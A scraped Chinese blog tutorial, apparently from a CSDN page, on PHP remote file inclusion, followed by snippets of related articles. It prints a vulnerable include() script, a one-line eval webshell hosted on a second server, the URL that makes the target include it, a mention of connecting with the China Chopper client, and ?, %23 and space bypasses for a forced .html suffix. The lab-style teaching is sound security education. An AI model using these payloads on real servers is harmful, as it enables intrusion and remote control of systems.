php远程包含木马,远程文件包含webshell

最新推荐文章于 2023-06-16 14:05:40 发布
最新推荐文章于 2023-06-16 14:05:40 发布
阅读量412 收藏
点赞数
文章标签: php远程包含木马

PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。

(

allow_url_fopen = On 是否允许打开远程文件

allow_url_include = On 是否允许include/require远程文件

)

注意:如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件

例如:我们用windows server 2003 服务器包含一个Linux上的phpinfo.php文件,那么得到的就是Linux的php配置文件,而不是Windows上的php配置文件。

无限制远程文件包含漏洞示例:

已知192.168.173.128这台服务器中存在着文件包含漏洞,我们想要通过远程包含自己的服务器上的木马文件

192.168.173.128/index.php

$filename = $_GET[‘page’];

Include($filename);

?>

首先,我们在自己的服务器192.168.173.129上新建一个文件2.txt

echo ‘hello hackerAK’

?>

我们通过远程包含文件包含到192.168.173.128这台目标服务器上,包含的方式与本地包含的方式一样:

http://192.168.173.128/index.php?page=http://192.168.173.129/2.txt

页面显示正常,说明文件包含成功!

我们继续包含一个木马文件getshell.txt看能否执行,为了方便查看,我们让它输出“123”

@eval($_POST['x']);

echo '123' ;

?>

我们在浏览器的地址栏中写入

http://192.168.173.128/index.php?page=http://192.168.173.129/getshell.txt

成功显示出页面,文件包含成功

下面我们用中国菜刀连一下,看能否连接到目标的服务器

有限制远程文件包含漏洞示例:

测试代码:

代码中多添加了html后缀,导致远程包含的文件也会多一个html后缀。

be68cf9be911?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

问号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

be68cf9be911?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

#号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

be68cf9be911?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

还有哪些可以绕过?用burp跑一遍发现空格也可以绕过:

be68cf9be911?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20

be68cf9be911?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

某miao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2036
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
php文件包含getshell
Jiajiajiang_的博客
07-11 5546
今天面试被问到这个了,已经是很久以前用到了,脑子一时短路,一点也想不起来,今天想捋一遍 参考 文件包含是应用程序(在这里就是指php函数引入文件时)未对要引用的文件做合理的校验,从而恶意的使应用程序操作了意料之外的文件,将会导致文件泄露,更有甚者会导致恶意代码的注入。 先介绍一下本地文件包含LFI(Local File Include) 举个最简单的例子,新建一个php文件,命...
文件包含渗透File inclusion 本地文件和远程文件包含+webshell(网络安全学习11)
Until_U的博客
07-04 3723
CONTENTS 1 文件包含渗透简述 1.1 原理和危害 1.2 实验模拟环境 2 低安全级别渗透 2.1 本地文件包含 2.2 本地文件包含+webshell 2.3 远程文件包含+webshell 3 中安全级别渗透 3.1 本地文件包含 3.2 本地文件包含+webshell 3.3 远程文件包含+webshell 4 高安全级别渗透 1 文件包含渗透简述 1.1 原理和危害 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启a.
php文件包含
m0_64361111的博客
02-28 1339
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
Solr服务,阿里云报警说是发现了漏洞,文件中包含WebShell代码
一个程序员的专栏
06-16 412
我查看了log里面的内容(中文显示乱码),记录了我们这个分片上的索引添加的一些内容,很奇怪的是里面竟然有异常信息,感觉像是我们的爬虫程序执行了一个API的接口调用,接口调用失败然后报了异常,我猜测这也导致了这个log文件的状态出现了异常,所以solr一直没有更新这个log。请注意,Tlog文件是可选的,并且可以在Solr配置中禁用。我们的场景是数据采集后存储在Solr里面,所以tlog里面记录了对索引的操作,采集的内容里面有WebShell代码,特别是一些技术类博客的内容,里面有代码块。
PHP远程文件包含(RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1618
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
文件包含漏洞——实例
weixin_54055099的博客
09-24 2871
文件包含漏洞的实例
php后门拿下当前目录
aici0819的博客
03-26 364
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHPwebshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
php远程包含木马,文件包含漏洞之本地包含远程包含
weixin_35700003的博客
03-19 478
文件包含漏洞介绍:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP...
php木马webshell扫描器代码
12-18
复制代码 代码如下: <?php /* +————————————————————————–+ | Codz by indexphp Version:0.01 | | (c) 2009 ...//设置要跳过检查的文件 $jump=’safe.php|g’; //设置要跳过检查的文件或
精确查找PHP WEBSHELL木马 修正版
10-28
上篇提到了关于网上流传查找PHP webshell的python脚本中,不严谨的代码,并且给出了一个python的检测代码,同时,下文里也提到不能检测到反引号的命令执行的地方。今天,我想了下,现在把思路发出来。
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
本地文件包含包含日志获取webshell
WYJ____的博客
08-06 3348
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会包含日志获取webshell 实验工具 浏览器 实验环境 客户机一台 实验步骤 1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。 2.浏览器设置代理服务的步骤...
远程文件包含漏洞案例讲解和演示
北冥有鱼
05-06 2201
我们可以通过php协议实现远程文件包含,这个include默认是关闭的,我们可以手动给他打开 远程包含漏洞危害级别要高出本地的很多,因为本地的利用是有限的,我们还需要去猜这个配置文件的漏洞,危害自然就低一些 比如我们可以在远端写一个一句话木马,放到本地去执行,实现了目标站点的远程控制 我们来到pikachu 随便提交一个 实际上他提交的是一个目标文件的路径 在测试站点中,直接写了一个fope...
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7704
本地文件包含&远程文件包含
文件包含漏洞(远程文件包含
Xiongcanne的博客
04-25 958
所需服务器:kalilinux apache2 打开靶机删除原有的一句话木马 使用kali打开apache2 在kali其中html文件夹中创建一个txt文件 键入i输入创建一句话木马的代码 我们使用浏览器打开txt文件,可以看到含有该代码 文件包含该链接,使其执行其中代码 成功创建一句话木马 接着就用中国蚁剑连接就行了。 ...
keil5安装程序(包含keygen)
最新发布
05-21
keil5安装程序(包含keygen)适用于单片机学习
webshell文件上传php上传
06-28
WebShell是一种可以在Web服务器上执行命令的脚本程序,而PHP...这两者之间并没有直接的联系,但是WebShell可以被用来上传PHP文件,从而实现文件上传功能。需要注意的是,WebShell的使用存在安全风险,应该谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值